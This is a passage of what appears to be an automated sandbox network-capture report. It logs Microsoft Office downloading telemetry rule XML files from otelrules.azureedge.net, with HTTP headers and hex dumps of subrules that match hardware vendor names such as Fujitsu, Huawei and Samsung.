              2024-11-29 23:41:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


              Session IDSource IPSource PortDestination IPDestination Port
              28192.168.2.44979013.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:21 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:21 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:21 GMT
              Content-Type: text/xml
              Content-Length: 472
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
              ETag: "0x8DC582B9DACDF62"
              x-ms-request-id: 905b8fff-d01e-00a1-0300-4235b1000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234121Z-174f7845968ljs8phC1EWRe6en00000010fg000000008gz0
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:21 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              29192.168.2.44979113.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:21 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:21 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:21 GMT
              Content-Type: text/xml
              Content-Length: 404
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
              ETag: "0x8DC582B9E8EE0F3"
              x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234121Z-174f78459688l8rvhC1EWRtzr00000000d6000000000dhz9
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:21 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


              Session IDSource IPSource PortDestination IPDestination Port
              30192.168.2.44979213.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:21 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:21 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:21 GMT
              Content-Type: text/xml
              Content-Length: 468
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
              ETag: "0x8DC582B9C8E04C8"
              x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234121Z-174f7845968zgtf6hC1EWRqd8s0000000tp0000000003c65
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:21 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              31192.168.2.44979313.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:21 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:21 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:21 GMT
              Content-Type: text/xml
              Content-Length: 428
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
              ETag: "0x8DC582BAC4F34CA"
              x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234121Z-174f7845968xr5c2hC1EWRd0hn0000000hg00000000084c0
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:21 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


              Session IDSource IPSource PortDestination IPDestination Port
              32192.168.2.44979513.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:23 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:23 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:23 GMT
              Content-Type: text/xml
              Content-Length: 415
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
              ETag: "0x8DC582B988EBD12"
              x-ms-request-id: 350da61a-901e-007b-1b03-42ac50000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234123Z-174f7845968pf68xhC1EWRr4h800000010wg000000008h1r
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:23 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


              Session IDSource IPSource PortDestination IPDestination Port
              33192.168.2.44979713.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:23 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:23 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:23 GMT
              Content-Type: text/xml
              Content-Length: 419
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
              ETag: "0x8DC582BB32BB5CB"
              x-ms-request-id: e24a55c4-201e-0003-1707-42f85a000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234123Z-174f784596886s2bhC1EWR743w00000010mg00000000efv0
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


              Session IDSource IPSource PortDestination IPDestination Port
              34192.168.2.44979413.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:23 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:23 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:23 GMT
              Content-Type: text/xml
              Content-Length: 499
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
              ETag: "0x8DC582B98CEC9F6"
              x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234123Z-174f7845968qj8jrhC1EWRh41s00000010p0000000001xhy
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:23 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              35192.168.2.44979813.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:23 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:23 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:23 GMT
              Content-Type: text/xml
              Content-Length: 494
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
              ETag: "0x8DC582BB8972972"
              x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234123Z-174f78459688l8rvhC1EWRtzr00000000d80000000007gnq
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:23 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              36192.168.2.44979613.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:23 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:24 UTC491INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:23 GMT
              Content-Type: text/xml
              Content-Length: 471
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
              ETag: "0x8DC582BB5815C4C"
              x-ms-request-id: 25bfb1e7-201e-00aa-3dab-423928000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234123Z-174f78459684db9fhC1EWRc7g400000000h000000000aw5k
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              X-Cache-Info: L1_T2
              Accept-Ranges: bytes
              2024-11-29 23:41:24 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              37192.168.2.44979913.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:25 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:25 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:25 GMT
              Content-Type: text/xml
              Content-Length: 420
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
              ETag: "0x8DC582B9DAE3EC0"
              x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234125Z-174f7845968kdththC1EWRzvxn0000000cw000000000ky8b
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


              Session IDSource IPSource PortDestination IPDestination Port
              38192.168.2.44980013.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:25 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:25 GMT
              Content-Type: text/xml
              Content-Length: 472
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
              ETag: "0x8DC582B9D43097E"
              x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234125Z-174f78459688l8rvhC1EWRtzr00000000da000000000287y
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              39192.168.2.44980113.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:25 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:25 GMT
              Content-Type: text/xml
              Content-Length: 427
              Connection: close
              Cache-Control: public, max-age=604800, immutable
